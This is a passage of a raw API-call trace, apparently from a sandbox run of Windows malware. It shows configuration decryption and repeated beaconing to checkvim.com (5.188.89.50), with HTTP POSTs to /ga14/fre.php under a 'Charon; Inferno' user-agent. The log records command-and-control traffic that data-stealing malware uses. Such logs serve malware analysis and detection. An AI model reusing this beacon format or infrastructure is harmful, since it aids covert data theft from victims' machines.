phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0301.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.207] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0301.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.207] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.208] GetProcessHeap () returned 0x840000 [0301.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0301.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.208] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0301.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.209] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0301.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.210] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0301.210] GetProcessHeap () returned 0x840000 [0301.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0301.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.211] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.212] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.212] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.213] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.213] GetProcessHeap () returned 0x840000 [0301.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0301.213] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0301.213] GetProcessHeap () returned 0x840000 [0301.213] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0301.213] GetProcessHeap () returned 0x840000 [0301.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0301.214] GetProcessHeap () returned 0x840000 [0301.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0301.214] GetProcessHeap () returned 0x840000 [0301.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0301.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.214] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0301.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.221] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0301.227] GetProcessHeap () returned 0x840000 [0301.227] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0301.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.228] CryptImportKey (in: hProv=0x86fe80, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0301.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.228] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0301.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.229] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.229] GetProcessHeap () returned 0x840000 [0301.229] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0301.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.230] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0301.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.231] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0301.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.231] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0301.231] GetProcessHeap () returned 0x840000 [0301.231] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0301.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.232] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0301.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.236] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0301.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.236] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0301.236] GetProcessHeap () returned 0x840000 [0301.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0301.237] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0301.238] GetProcessHeap () returned 0x840000 [0301.238] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c18 [0301.238] socket (af=2, type=1, protocol=6) returned 0x4e0 [0301.238] connect (s=0x4e0, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0301.309] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0301.309] GetProcessHeap () returned 0x840000 [0301.309] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0301.309] GetProcessHeap () returned 0x840000 [0301.309] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0301.310] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0301.311] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0301.311] GetProcessHeap () returned 0x840000 [0301.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0301.311] GetProcessHeap () returned 0x840000 [0301.311] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0301.311] GetProcessHeap () returned 0x840000 [0301.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f9e0 [0301.311] GetProcessHeap () returned 0x840000 [0301.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0301.312] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0301.313] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0301.313] GetProcessHeap () returned 0x840000 [0301.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0301.313] GetProcessHeap () returned 0x840000 [0301.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0301.313] send (s=0x4e0, buf=0x873a58*, len=237, flags=0) returned 237 [0301.313] send (s=0x4e0, buf=0x87eb58*, len=159, flags=0) returned 159 [0301.313] GetProcessHeap () returned 0x840000 [0301.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0301.313] recv (in: s=0x4e0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0301.667] GetProcessHeap () returned 0x840000 [0301.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0301.667] GetProcessHeap () returned 0x840000 [0301.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0301.667] GetProcessHeap () returned 0x840000 [0301.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0301.667] GetProcessHeap () returned 0x840000 [0301.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0301.667] closesocket (s=0x4e0) returned 0 [0301.668] GetProcessHeap () returned 0x840000 [0301.668] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c18 | out: hHeap=0x840000) returned 1 [0301.668] GetProcessHeap () returned 0x840000 [0301.668] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0301.668] GetProcessHeap () returned 0x840000 [0301.668] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0301.668] GetProcessHeap () returned 0x840000 [0301.668] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0301.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xc80) returned 0x4e0 [0301.670] Sleep (dwMilliseconds=0xea60) [0301.686] GetProcessHeap () returned 0x840000 [0301.686] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0301.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.688] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0301.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.694] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0301.700] GetProcessHeap () returned 0x840000 [0301.700] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0301.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.701] CryptImportKey (in: hProv=0x86f710, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0301.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.702] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0301.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.703] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.703] GetProcessHeap () returned 0x840000 [0301.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0301.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.704] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0301.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.704] CryptDestroyKey (hKey=0x87e270) returned 1 [0301.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.705] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0301.705] GetProcessHeap () returned 0x840000 [0301.705] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0301.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.706] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.707] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.707] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.708] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.708] GetProcessHeap () returned 0x840000 [0301.708] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0301.708] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0301.708] GetProcessHeap () returned 0x840000 [0301.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0301.708] GetProcessHeap () returned 0x840000 [0301.709] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0301.709] GetProcessHeap () returned 0x840000 [0301.709] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0301.709] GetProcessHeap () returned 0x840000 [0301.709] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0301.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.709] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0301.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.714] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0301.719] GetProcessHeap () returned 0x840000 [0301.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0301.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.720] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0301.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.721] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0301.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.722] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.722] GetProcessHeap () returned 0x840000 [0301.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0301.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.722] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0301.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.723] CryptDestroyKey (hKey=0x87e930) returned 1 [0301.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.724] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0301.724] GetProcessHeap () returned 0x840000 [0301.724] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0301.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.725] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0301.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.725] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0301.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.726] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0301.726] GetProcessHeap () returned 0x840000 [0301.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0301.727] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0301.728] GetProcessHeap () returned 0x840000 [0301.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0301.728] socket (af=2, type=1, protocol=6) returned 0x4e4 [0301.728] connect (s=0x4e4, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0301.802] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0301.802] GetProcessHeap () returned 0x840000 [0301.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0301.802] GetProcessHeap () returned 0x840000 [0301.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0301.803] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0301.803] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0301.803] GetProcessHeap () returned 0x840000 [0301.803] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0301.804] GetProcessHeap () returned 0x840000 [0301.804] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0301.804] GetProcessHeap () returned 0x840000 [0301.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0301.804] GetProcessHeap () returned 0x840000 [0301.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0301.805] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0301.806] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0301.806] GetProcessHeap () returned 0x840000 [0301.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0301.806] GetProcessHeap () returned 0x840000 [0301.806] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0301.806] send (s=0x4e4, buf=0x873a58*, len=237, flags=0) returned 237 [0301.806] send (s=0x4e4, buf=0x87eb58*, len=159, flags=0) returned 159 [0301.806] GetProcessHeap () returned 0x840000 [0301.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0301.806] recv (in: s=0x4e4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0302.177] GetProcessHeap () returned 0x840000 [0302.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0302.177] GetProcessHeap () returned 0x840000 [0302.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0302.177] GetProcessHeap () returned 0x840000 [0302.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0302.178] GetProcessHeap () returned 0x840000 [0302.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0302.178] closesocket (s=0x4e4) returned 0 [0302.178] GetProcessHeap () returned 0x840000 [0302.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0302.179] GetProcessHeap () returned 0x840000 [0302.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0302.179] GetProcessHeap () returned 0x840000 [0302.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0302.179] GetProcessHeap () returned 0x840000 [0302.179] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0302.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x7a0) returned 0x4e4 [0302.185] Sleep (dwMilliseconds=0xea60) [0302.231] GetProcessHeap () returned 0x840000 [0302.231] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0302.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.233] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0302.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.240] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0302.253] GetProcessHeap () returned 0x840000 [0302.253] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0302.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.254] CryptImportKey (in: hProv=0x86fe80, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0302.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.256] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0302.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.258] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.258] GetProcessHeap () returned 0x840000 [0302.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0302.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.259] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0302.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.260] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0302.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.262] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0302.262] GetProcessHeap () returned 0x840000 [0302.262] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0302.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.263] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.264] StrStrA 